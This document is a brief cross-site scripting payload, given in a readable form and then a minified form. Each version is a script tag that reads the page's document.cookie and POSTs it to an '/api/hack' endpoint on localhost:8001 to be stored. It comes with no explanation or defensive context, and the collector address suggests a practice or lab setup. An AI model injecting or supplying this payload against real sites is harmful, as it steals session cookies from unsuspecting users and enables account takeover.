<script>
    window.fetch('http://localhost:8001/api/hack', {
    method: 'POST',
    headers: {
    'Accept': 'application/json',
    'content-Type': 'application/json'
}, body: JSON.stringify({raw: escape(document.cookie),output: 'store'})
}).then(response => console.log(response)).catch(err => console.error(err))
</script>

MINIFIED VERSION:

<script>window.fetch("http://localhost:8001/api/hack",{method:"POST",headers:{Accept:"application/json","content-Type":"application/json"},body:JSON.stringify({raw:escape(document.cookie),output:"store"})}).then((o=>console.log(o))).catch((o=>console.error(o)));</script>
